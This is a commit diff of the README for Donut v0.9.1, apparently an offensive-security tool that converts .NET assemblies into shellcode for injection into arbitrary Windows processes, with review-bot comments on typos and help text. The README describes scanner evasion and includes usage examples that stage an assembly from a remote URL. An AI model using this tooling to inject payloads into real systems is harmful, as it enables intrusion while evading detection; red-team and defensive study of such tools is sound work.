v0.9.1 changes
TheWover authored Jun 6, 2019
1 parent 2f23a4d commit 4507ac2
Showing 1 changed file with 14 additions and 10 deletions.
24 changes: 14 additions & 10 deletions README.md
@@ -1,15 +1,17 @@
# Using Donut

![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
Version: 0.9 (Beta) *please submit issues and requests for v1.0 release*
Version: 0.9.1 (Beta) *please submit issues and requests for v1.0 release*

Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/

TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/

Version 0.9.1 "Apple Fritter" Release Blog Post: https://thewover.github.io/Apple-Fritter/

## Introduction

Donut is a shellcode generation tool that creates x86 or x64 shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
Donut is a shellcode generation tool that creates position-independant shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.

It can be used in several ways.

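Review bot: the rewritten intro sentence ("creates position-independant shellcode payloads from .NET Assemblies") misspells "independent", and the same paragraph already says two sentences later that Donut "produces position-independent shellcode that loads it from memory", so the new wording is both a typo and a repetition. Suggest either keeping the architecture detail the old line carried ("creates x86 or x64 shellcode payloads") or dropping the adjective from the first sentence: "Donut is a shellcode generation tool that creates shellcode payloads from .NET Assemblies." Minor, while the header is being touched: the image still has the placeholder alt text "Alt text"; something like "Donut logo" would read better.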
@@ -19,20 +21,21 @@ Donut can be used as-is to generate shellcode from arbitrary .NET Assemblies. Bo

```
usage: donut [options] -f <.NET assembly> -c <namespace.class> -m <Method>
usage: donut [options] -f <.NET assembly>
-f <path> .NET assembly to embed in PIC and DLL.
-u <URL> HTTP server hosting the .NET assembly.
-c <namespace.class> The assembly class name.
-m <method> The assembly method name.
-p <arg1,arg2...> Optional parameters for method, separated by comma or semi-colon.
-a <arch> Target architecture : 1=x86, 2=amd64(default).
-r <version> CLR runtime version. v4.0.30319 is used by default.
-u <URL> HTTP server that will host the .NET assembly.
-c <namespace.class> Optional class name. (required for DLL)
-m <method> Optional method name. (required for DLL)
-p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
-a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
-r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
-d <name> AppDomain name to create for assembly. Randomly generated by default.
examples:
donut -a 1 -c TestClass -m RunProcess -p notepad.exe -f loader.dll
donut -f assembly.exe
donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe -u http://remote_server.com/modules/
```
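Review bot: the new -r help line, "MetaHeader used by default or v4.0.30319 if none available.", does not say what "MetaHeader" is; someone reading --help will not know it refers to the runtime version recorded in the assembly's CLR metadata header. Suggest "CLR runtime version. Defaults to the version in the assembly's metadata header, or v4.0.30319 if none is found." Two related gaps in the same block: the last example passes both -f loader.dll and -u http://remote_server.com/modules/, but nothing in the help explains how the two interact when given together (the -f line still says "to embed in PIC and DLL", and the new usage line lists only -f), so a clause on -u such as "stage the assembly from this URL instead of embedding it" and a mention of -u in the usage line would remove the ambiguity; and the -a default changing from "2=amd64(default)" to "3=amd64+x86(default)" is a behaviour change for existing users that deserves a sentence in the release notes.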
@@ -42,6 +45,7 @@ Donut can be used as-is to generate shellcode from arbitrary .NET Assemblies. Bo
Tags have been provided for each release version of donut that contain the compiled executables.

* v0.9 Beta: https://github.com/TheWover/donut/releases/tag/v0.9
* v0.9.1 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.1

However, you may also clone and build the source yourself using the provided makefiles. Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:

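Review bot: the added v0.9.1 release link matches the tag naming of the v0.9 entry above it, so nothing to change there; since this section is being edited anyway, the unchanged build paragraph directly below has two typos worth fixing in the same commit, "Microsft" (Microsoft) and "commmands" (commands).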